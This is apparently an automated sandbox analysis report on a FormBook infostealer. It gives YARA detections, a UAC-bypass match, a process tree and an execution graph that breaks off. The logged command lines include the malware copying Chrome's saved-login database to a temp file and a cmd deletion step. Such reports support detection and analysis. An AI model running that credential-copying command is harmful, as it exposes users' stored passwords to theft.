                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Target ID:6
                                                                                                                                        Start time:20:12:21
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Target ID:7
                                                                                                                                        Start time:20:12:26
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                        Imagebase:0x7ff6b8cf0000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Target ID:8
                                                                                                                                        Start time:20:12:27
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Jwjxmakrv.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:938496 bytes
                                                                                                                                        MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 29%, ReversingLabs
                                                                                                                                        Reputation:low

                                                                                                                                        General

                                                                                                                                        Target ID:14
                                                                                                                                        Start time:20:12:38
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Jwjxmakrv.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:938496 bytes
                                                                                                                                        MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low

                                                                                                                                        General

                                                                                                                                        Target ID:19
                                                                                                                                        Start time:20:12:43
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                                                        Imagebase:0xc20000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Target ID:21
                                                                                                                                        Start time:20:12:44
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Target ID:23
                                                                                                                                        Start time:20:12:57
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                                                        Imagebase:0xc20000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Target ID:24
                                                                                                                                        Start time:20:12:58
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Target ID:29
                                                                                                                                        Start time:20:13:21
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        Imagebase:0x1080000
                                                                                                                                        File size:61952 bytes
                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                        General

                                                                                                                                        Target ID:30
                                                                                                                                        Start time:20:13:27
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:/c del "C:\Windows\SysWOW64\cmd.exe"
                                                                                                                                        Imagebase:0xc20000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Target ID:31
                                                                                                                                        Start time:20:13:28
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Target ID:40
                                                                                                                                        Start time:20:15:29
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                                        Imagebase:0xc20000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Target ID:41
                                                                                                                                        Start time:20:15:31
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Target ID:46
                                                                                                                                        Start time:20:15:53
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                                                        Imagebase:0x3e0000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Target ID:47
                                                                                                                                        Start time:20:15:55
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Disassembly

                                                                                                                                        Reset < >

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 035D083E Relevance: .0, Instructions: 39COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000003.247483662.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_3_35cf000_TR0627729920002.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7c4ec784f5d6e52fd627bd102309f4a21434609c883a2f034937fdf1deaa1972
                                                                                                                                          • Instruction ID: 4aa5fb78b12670fa7955d00c2e2ca8bd8491f6968eb3799cd22b80c637389f77
                                                                                                                                          • Opcode Fuzzy Hash: 7c4ec784f5d6e52fd627bd102309f4a21434609c883a2f034937fdf1deaa1972
                                                                                                                                          • Instruction Fuzzy Hash: E1F02429049AA95BDB16EF69AA8068BFB51EEC23107A442A8C1D187166E361904BD7D0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D083E Relevance: .0, Instructions: 39COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000003.247483662.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 035CF000, based on PE: false
                                                                                                                                          • Associated: 00000000.00000003.247244772.00000000035CF000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_3_35cf000_TR0627729920002.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7c4ec784f5d6e52fd627bd102309f4a21434609c883a2f034937fdf1deaa1972
                                                                                                                                          • Instruction ID: 4aa5fb78b12670fa7955d00c2e2ca8bd8491f6968eb3799cd22b80c637389f77
                                                                                                                                          • Opcode Fuzzy Hash: 7c4ec784f5d6e52fd627bd102309f4a21434609c883a2f034937fdf1deaa1972
                                                                                                                                          • Instruction Fuzzy Hash: E1F02429049AA95BDB16EF69AA8068BFB51EEC23107A442A8C1D187166E361904BD7D0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:0.6%
                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                          Signature Coverage:59.9%
                                                                                                                                          Total number of Nodes:693
                                                                                                                                          Total number of Limit Nodes:43
                                                                                                                                          execution_graph 15848 3c19540 LdrInitializeThunk 16450 3c8d380 16451 3c8d38c 16450->16451 16452 3c8d393 16450->16452 16453 3c8d3a0 GetPEB 16452->16453 16453->16451 16454 3c036cc 16455 3c036d4 GetPEB 16454->16455 16456 3c036e6 16454->16456 16457 3c036e5 16455->16457 16458 3c237cc 16459 3c237db 16458->16459 16460 3c237ea 16459->16460 16462 3c2590b 16459->16462 16463 3c25917 16462->16463 16466 3c2592d 16462->16466 16464 3c1b58e _vswprintf_s 11 API calls 16463->16464 16465 3c25923 16464->16465 16465->16460 16466->16460 16467 3c8239a 16468 3c823d5 16467->16468 16469 3c1b640 _vswprintf_s 11 API calls 16468->16469 16470 3c823df 16469->16470 16471 3c5b111 16472 3c5b143 16471->16472 16473 3c5b131 16471->16473 16475 3c621b7 16473->16475 16478 3c1e3a0 16475->16478 16481 3c1e3bd 16478->16481 16480 3c1e3b8 16480->16472 16482 3c1e3e3 16481->16482 16483 3c1e3cc 16481->16483 16485 3c1b58e _vswprintf_s 11 API calls 16482->16485 16486 3c1e3d8 _vswprintf_s 16482->16486 16484 3c1b58e _vswprintf_s 11 API calls 16483->16484 16484->16486 16485->16486 16486->16480 16487 3bd0b60 16488 3bd0b72 16487->16488 16490 3bd0baf 16487->16490 16488->16490 16491 3bd0bd0 16488->16491 16492 3bd0c66 16491->16492 16493 3bd0c05 16491->16493 16494 3c2e940 16492->16494 16495 3c2e915 16492->16495 16496 3bd0c8d _vswprintf_s 16492->16496 16493->16492 16493->16496 16499 3c21700 11 API calls 16493->16499 16494->16496 16498 3c21700 11 API calls 16494->16498 16495->16496 16500 3c21700 16495->16500 16496->16490 16498->16496 16499->16493 16503 3c214e9 16500->16503 16502 3c2171c 16502->16496 16505 3c214fb 16503->16505 16504 3c1b58e _vswprintf_s 11 API calls 16506 3c2150e __cftof 16504->16506 16505->16504 16505->16506 16506->16502 16507 3cae62a 16512 3cae667 _vswprintf_s 16507->16512 16508 3cae66f 16509 3c1b640 _vswprintf_s 11 API calls 16508->16509 16510 3cae725 16509->16510 16511 3cae704 16511->16508 16519 3cae5b6 16511->16519 16512->16508 16512->16511 16515 3cae824 16512->16515 16518 3cae853 _vswprintf_s 16515->16518 16516 3c1b640 _vswprintf_s 11 API calls 16517 3caed3b 16516->16517 16517->16512 16518->16516 16520 3cae608 16519->16520 16521 3cae5e1 16519->16521 16523 3c1b640 _vswprintf_s 11 API calls 16520->16523 16521->16520 16525 3caed52 16521->16525 16524 3cae626 16523->16524 16524->16508 16526 3caed73 16525->16526 16527 3c1b640 _vswprintf_s 11 API calls 16526->16527 16528 3caee6d 16527->16528 16528->16521 16529 3c035a1 16530 3c035a7 16529->16530 16531 3c035b7 16530->16531 16532 3c035b8 GetPEB 16530->16532 16533 3beeb70 32 API calls 16532->16533 16533->16531 16534 3c90a28 16535 3c90a57 16534->16535 16537 3c90a4d 16534->16537 16538 3c04e70 16535->16538 16539 3c04e94 16538->16539 16543 3c04ec0 16538->16543 16540 3c1b640 _vswprintf_s 11 API calls 16539->16540 16541 3c04eac 16540->16541 16541->16537 16543->16539 16544 3c88df1 16543->16544 16552 3c2d0e8 16544->16552 16546 3c88dfd GetPEB 16547 3c88e10 16546->16547 16548 3c65720 _vswprintf_s 11 API calls 16547->16548 16549 3c88e2f 16547->16549 16548->16549 16550 3c2d130 _vswprintf_s 11 API calls 16549->16550 16551 3c88ebd 16550->16551 16551->16539 16552->16546 16553 3bd1190 16554 3bd11a0 16553->16554 16556 3bd11be 16553->16556 16554->16556 16557 3bd11e0 16554->16557 16560 3bd1204 16557->16560 16558 3c1b640 _vswprintf_s 11 API calls 16559 3bd1296 16558->16559 16559->16556 16560->16558 15856 3ca5ba5 15857 3ca5bb4 _vswprintf_s 15856->15857 15861 3ca5c2a _vswprintf_s 15857->15861 15863 3ca5c10 15857->15863 15867 3ca4c56 15857->15867 15861->15863 15865 3ca60cf GetPEB 15861->15865 15866 3c19710 LdrInitializeThunk 15861->15866 15871 3c16de6 15861->15871 15877 3c2d130 15863->15877 15865->15861 15866->15861 15868 3ca4c62 _vswprintf_s 15867->15868 15869 3c2d130 _vswprintf_s 11 API calls 15868->15869 15870 3ca4caa 15869->15870 15870->15861 15872 3c16e03 15871->15872 15876 3c16e73 15871->15876 15874 3c16e53 15872->15874 15872->15876 15880 3c16ebe 15872->15880 15874->15876 15888 3c06a60 15874->15888 15876->15861 15878 3c1b640 _vswprintf_s 11 API calls 15877->15878 15879 3c2d13a 15878->15879 15879->15879 15893 3beeef0 15880->15893 15883 3c16f0d 15898 3beeb70 15883->15898 15885 3c16f48 15885->15872 15887 3c16eeb 15887->15883 15904 3c17742 15887->15904 15909 3c884e0 15887->15909 15889 3c48025 15888->15889 15890 3c06a8d _vswprintf_s 15888->15890 15890->15889 15891 3c1b640 _vswprintf_s 11 API calls 15890->15891 15892 3c06b66 15891->15892 15892->15876 15894 3beef0c 15893->15894 15896 3beef21 15893->15896 15894->15887 15895 3beef29 15895->15887 15896->15895 15915 3beef40 15896->15915 15899 3beeb9e 15898->15899 15900 3beeb81 15898->15900 15899->15885 15900->15899 15902 3beebac 15900->15902 16149 3c6ff10 15900->16149 15902->15899 16143 3bd4dc0 15902->16143 15905 3c17827 15904->15905 15907 3c17768 _vswprintf_s 15904->15907 15905->15887 15906 3beeef0 26 API calls 15906->15907 15907->15905 15907->15906 15908 3beeb70 32 API calls 15907->15908 15908->15907 15910 3c88511 15909->15910 15911 3beeb70 32 API calls 15910->15911 15913 3c88556 15911->15913 15912 3beeef0 26 API calls 15914 3c885f1 15912->15914 15913->15912 15914->15887 15916 3bef0bd 15915->15916 15917 3beef5d 15915->15917 15916->15917 15953 3bd9080 15916->15953 15920 3bef071 15917->15920 15922 3bef042 15917->15922 15923 3bd2d8a 15917->15923 15920->15894 15921 3bef053 GetPEB 15921->15920 15922->15920 15922->15921 15925 3bd2db8 15923->15925 15939 3bd2df1 _vswprintf_s 15923->15939 15924 3bd2de7 15924->15939 15963 3c01624 15924->15963 15925->15924 15925->15939 15959 3bd2e9f 15925->15959 15926 3c2f9d0 GetPEB 15929 3c2f9e3 GetPEB 15926->15929 15929->15939 15933 3bd2e5a 15934 3bd2e61 15933->15934 15938 3bd2e99 _vswprintf_s 15933->15938 15935 3bf7d50 GetPEB 15934->15935 15952 3bd2e69 15934->15952 15937 3c2fa76 15935->15937 15940 3c2fa8a 15937->15940 15941 3c2fa7a GetPEB 15937->15941 15944 3bd2ece 15938->15944 16004 3c195d0 LdrInitializeThunk 15938->16004 15939->15926 15939->15929 15939->15933 15957 3bf7d50 GetPEB 15939->15957 15968 3c6fe87 15939->15968 15975 3c6fdda 15939->15975 15981 3c6ffb9 15939->15981 15989 3c65720 15939->15989 15945 3c2fa97 GetPEB 15940->15945 15940->15952 15941->15940 15944->15917 15946 3c2faaa 15945->15946 15945->15952 15947 3bf7d50 GetPEB 15946->15947 15948 3c2faaf 15947->15948 15949 3c2fac3 15948->15949 15950 3c2fab3 GetPEB 15948->15950 15949->15952 15992 3c57016 15949->15992 15950->15949 15952->15917 15954 3bd909e GetPEB 15953->15954 15955 3bd9098 15953->15955 15956 3bd90aa 15954->15956 15955->15954 15956->15917 15958 3bf7d5d 15957->15958 15958->15939 15960 3bd2ebb _vswprintf_s 15959->15960 15962 3bd2ece 15960->15962 16005 3c195d0 LdrInitializeThunk 15960->16005 15962->15924 16006 3c016e0 15963->16006 15966 3c01630 15967 3c01691 15966->15967 16010 3c0a185 15966->16010 15967->15939 15969 3bf7d50 GetPEB 15968->15969 15970 3c6fec1 15969->15970 15971 3c6fec5 GetPEB 15970->15971 15972 3c6fed5 _vswprintf_s 15970->15972 15971->15972 16015 